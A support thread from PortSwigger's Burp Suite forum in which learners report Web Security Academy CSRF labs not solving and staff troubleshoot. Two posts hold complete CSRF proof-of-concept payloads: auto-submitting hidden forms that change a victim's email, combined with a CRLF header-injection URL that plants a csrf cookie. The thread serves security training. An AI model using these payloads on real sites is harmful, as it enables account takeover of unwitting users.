Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

CSRF Labs are buggy not working

M | Last updated: Feb 08, 2023 12:32PM UTC

Currently i'm trying to solve the CSRF labs. However, it seems that these are not working properly; It seems that the system doensn't work when you "deliver exloit to user". I know for a fact that the CSRF Payload is working, when i use the option "view exploit" the e-mail address of the user peter wiener gets updated. So it is not the payload that isn't working. Things i tried: Different form payload Community solution BurpSuite provided solution. No matter what i do, the lab doesn't see any solution as the proper solution.

nate | Last updated: Feb 08, 2023 02:21PM UTC

Same issue - definitely works for me but when delivering to client the client IP is never logged

Ben, PortSwigger Agent | Last updated: Feb 09, 2023 09:34AM UTC

Hi both, Just to clarify, you are having issues solving all of the labs in the CSRF topic or just certain ones? Are we able to drill down into a specific lab and get some details of how you are trying to solve it so that we can take a look at this for you?

Eragon | Last updated: Feb 09, 2023 12:05PM UTC

As in the lab, we can exploit the redirect_ui vulnerability by using the exploit server. I was wondering if you could help me understand how someone could exploit the redirect URI vulnerability in OAuth without knowing a valid client ID. From what I understand, the client ID acts as an identifier for the OAuth client, and without it, the authorization server will not proceed with the authorization flow. & in the lab, we can able to get the auth code from the admin without knowing his client_Id? Can you explain this further and if there is a way to exploit the redirect URI without a valid client ID?

Ben, PortSwigger Agent | Last updated: Feb 10, 2023 08:17AM UTC

Hi Eragon, Thanks for your query. Unfortunately, we are unable to provide personal support or tutoring to Academy users, as we prefer to improve the experience for our entire userbase by focussing on expanding and refining our public content. We will leave your post up on the forum in case a member of the community wants to reply.

Kartik | Last updated: Feb 26, 2023 03:24AM UTC

same issue. all csrf labs are not working.

Ben, PortSwigger Agent | Last updated: Feb 27, 2023 05:35PM UTC

Hi Kartik, Are you able to provide us with some details of what steps you are carrying out to try and solve one of the labs so that we can take a look at this for you?

Moustafa | Last updated: Jun 27, 2024 12:25PM UTC

did you solve it ?

Ben, PortSwigger Agent | Last updated: Jun 27, 2024 12:29PM UTC

Hi Moustafa, These labs should still be solvable using a standard version of Chrome. If you are having any specific issues with a particular lab then please let us know which lab, what your payload looks like and what you see when you view your exploit so that we can assist you further with this.

Manish | Last updated: Sep 13, 2024 08:29AM UTC

I am currently working on the CSRF labs and encountered issues with two specific labs: Lab 5: CSRF where the token is tied to a non-session cookie Lab 6: CSRF where the token is duplicated in the cookie Payload of LAB 6: <html> <body> <script>history.pushState('', '', '/');</script> <form action="https://0a8100f304cda36a8053805a00d700b6.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="usertest@gmail.com" /> <input type="hidden" name="csrf" value="iOfnXm4bKaalvBK2w3Itvkm3Vw2VsTCI" /> <input type="submit" value="Submit request" /> </form> <img src="0a8100f304cda36a8053805a00d700b6.web-security-academy.net/?search=please%0d%0aSet-Cookie:%20csrf=iOfnXm4bKaalvBK2w3Itvkm3Vw2VsTCI" width="0" height="0" border="0" onerror="document.forms[0].submit()"> </body> </html> While the `View Exploit` feature works, the `Deliver Exploit to Victim` feature does not function correctly after storing the payload in the Body. I have tried various browsers, including Google Chrome, Burp Chrome, Brave, Microsoft Edge, Firefox, and Cyberfox, but the issue persists across all browsers.

Ben, PortSwigger Agent | Last updated: Sep 17, 2024 07:57AM UTC

Hi Manish, For the 6th lab, as noted in the written solution, you need to set the CSRF token to the value of 'false'. I have just run through this lab and been able to solve it using the written solution so it does appear to be working as expected.

Manish | Last updated: Sep 17, 2024 12:42PM UTC

Hi Ben, Also, after modifying the value of CSRF to false, I started encountering an "Invalid CSRF token" error. This error seems to occur when I attempt to click on "View Exploit". Still these 2 labs have some kind of issues. Could you please provide guidance on why this error is being triggered and how to proceed with this scenario?

Ben, PortSwigger Agent | Last updated: Sep 17, 2024 12:56PM UTC

Hi Manish, If it helps, this is the exploit I am using for the lab 'CSRF where the token is duplicated in the cookie': <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0aa5006d03cf1c42800e171c001100b2.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="test3&#64;hotmail&#46;com" /> <input type="hidden" name="csrf" value="fake" /> <input type="submit" value="Submit request" /> </form> <img src="https://0aa5006d03cf1c42800e171c001100b2.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/> </body> </html> Testing this again and it solves the lab.

Manish | Last updated: Sep 18, 2024 06:28AM UTC